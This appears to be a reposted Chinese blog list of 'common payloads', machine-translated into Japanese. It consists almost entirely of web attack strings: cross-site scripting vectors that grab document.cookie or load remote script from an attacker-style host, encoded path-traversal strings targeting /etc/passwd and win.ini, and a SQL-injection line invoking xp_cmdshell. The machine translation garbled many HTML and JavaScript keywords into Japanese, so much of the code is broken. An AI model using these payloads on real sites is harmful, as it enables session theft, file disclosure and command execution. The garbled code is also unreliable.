一般的なペイロード

'>> <スクリプト>アラート(document.cookie)</ SCRIPT
> <SCRIPT>アラート(document.cookie)</スクリプト> ='
<スクリプト>アラート(document.cookie)</ SCRIPT>
<SCRIPT>警告(脆弱)</スクリプト>
%3Cscript%3Ealert( 'XSS')%%3E 3C /スクリプト
<スクリプト>警告( 'XSS')</スクリプト>
<IMGのSRC = "ジャバスクリプト:警告( 'XSS')">
の0A %0Aの<script>警告(\ "脆弱\")</ SCRIPT> .jspという
%22%3cscript%3ealert(%22xss%22)%3cと/スクリプト%3E
%2E%2E /%2E%2E /%2E% 2E /%2E%2E /%2E%2E /%2E%2E /%2E%2E / etc / passwdファイル
%2E%2E /%2E%2E /%2E%2E /%2E%2E /%2E%2E /窓/勝利。INI
%3C / A%3E%3cscript%3ealert(%22xss%22)%3C /スクリプト%3E
%3C /タイトル%3E%3cscript%3ealert(%22xss%22)%の3C /スクリプト%3E
%3cscript%3ealertを( %22xss%22)%の3C /スクリプト%3E / index.htmlを
%3f.jsp
%3f.jsp
<スクリプト>アラート( '脆弱'); </ SCRIPT>
<SCRIPT>警告( '脆弱')</スクリプト>
?sql_debug = 1
A%5c.aspx
a.jsp / <スクリプト>アラート( '脆弱')< /スクリプト>
/
<スクリプト>アラート( '脆弱')</スクリプト>?
「> <SCRIPT>警告( '脆弱')</スクリプト>
「;%20master..xp_cmdshell%20'dir%20 Cをexecし:%20>%20cに:\のinetpub \ wwwrootの\?。txtの' - &&
%22%3E%3Cscript%3Ealert(document.cookie)%3C /スクリプト%3E
%3Cscript%の3Ealert(。ドキュメントドメイン);%の3C /スクリプト%3E&
%3Cscript%3Ealert(document.domainを);%3C /スクリプト%の3E&SESSION_ID = {SESSION_ID}&SESSION_ID =
<IMG SRC = "ジャバスクリプト:アラート( 'XSS');">
<IMGのSRC =ジャバスクリプト:警告( 'XSS')>
<IMG SRC = JAVASCRIPT:警告( 'XSS')>
<IMG SRC = JAVASCRIPT:警告( "XSS")>
<IMG SRC =ジャバスクリプト:警告( 'XSS')>
<IMG SRC =ジャバスクリプト:警告( 'XSS')>
<IMG SRC =&#X6A&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&# X74&#X3A&#X61&#のx6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>
<IMG SRC = "JAVのascript:警告( 'XSS');">
<IMG SRC =」 JAV ascript:警告( 'XSS'); ">
<IMG SRC =" JAVのascript:警告( 'XSS'); ">
"<IMG SRC = Javaの\の0script:警告(\" XSS \")> ";」>うち
<IMG SRC =」ジャバスクリプト:アラート( 'XSS'); ">
<SCRIPT> A = / XSS /アラート(a.source)</ SCRIPT>
<BODY背景="ジャバスクリプト:警告(」





<LAYER SRC = "http://xss.ha.ckers.org/a.js"> </レイヤー>
<LINK REL = "スタイルシート"のhref = "javascriptの:警告( 'XSS');">
<IMG SRC = 'のVBScript:メッセージボックス( "XSS")'>
<IMG SRC = "モカ:[コード]">
<IMG SRC = "livescript:[コード]">
<META HTTP-EQUIV = "リフレッシュ" CONTENT = "0。 URL =ジャバスクリプト:警告( 'XSS'); ">
<IFRAMEのSRC =ジャバスクリプト:警告( 'XSS')> </ IFRAME>
<FRAMESET> <FRAMEのSRC =ジャバスクリプト:警告( 'XSS')> </ FRAME> </ FRAMESET>
<TABLE背景= "ジャバスクリプト:アラート( 'XSS')">
<DIV STYLE = "背景画像:URL(ジャバスクリプト:アラート( 'XSS'))">
<DIVのSTYLE = "行動:URL( 'http://www.how-to-hack.org/exploit.html');">
<DIV STYLE = "幅:式(警告( 'XSS'));">
<STYLE> @im \ポート'\ JA \ VASC \ RIPT:警告( "XSS")'; </ STYLE>
<IMG STYLEは= 'XSS:expre \ ssion(警告( "XSS"))'>
<STYLEのTYPE = "テキスト/ javascriptの">警告( 'XSS'); </ STYLE>
<STYLEのTYPE = "テキスト/ cssの" > .XSS {背景画像:URL( "ジャバスクリプト:アラート( 'XSS')");} </ STYLE> <A class="XSS"> </A>
<STYLEタイプ= "テキスト/ CSS"> BODY {背景:URL( "ジャバスクリプト:アラート( 'XSS')")} </ STYLE>
<BASEのHREF = "javascriptの:アラート( 'XSS'); //">
のgetURL( "javascriptの:アラート( 'XSS') ")
A =" GET "; B =" URL "; C =" javascript: "形式と、d ="警告( 'XSS'); ";のeval(A + B + C + D)。
<XMLのSRC = "ジャバスクリプト:警告( 'XSS');">
"> <BODY ONLOAD ="();


!<! - #execのCMD = "/ binに/エコー'<SCRIPT SRC'" - > < - #execのCMD = "/ binに/「=のhttpエコー://xss.ha.ckers.org/a .js> </ SCRIPT> ' " - >
<IMGのSRC =" http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode ">
<SCRIPTのA ="> "SRC ="のhttp:// xss.ha.ckers.org/a.js "> </ SCRIPT>
<SCRIPT =">」SRC = "http://xss.ha.ckers.org/a.js"> </ SCRIPT>
<SCRIPT A = ">" '' SRC = "http://xss.ha.ckers.org/a.js"> </ SCRIPT>
<SCRIPT "= '>'" SRC = "のhttp://xss.ha。 ckers.org/a.js "> </ SCRIPT>
<SCRIPT>のdocument.write(" <SCRI "); </ SCRIPT> PT SRC =" http://xss.ha.ckers.org/a.js」> </ SCRIPT>
<A href=http://www.gohttp://www.google.com/ogle.com/>リンク</A>

著者:carsonsoding
リンクします。https://www.jianshu.com/p/01377ad556f0
出典:ジェーン・ブック
著者によって予約ジェーンブックの著作権は、いかなる形で再現され、承認を得るために作者に連絡して、ソースを明記してください。

おすすめ

転載: www.cnblogs.com/wang1212-/p/10994532.html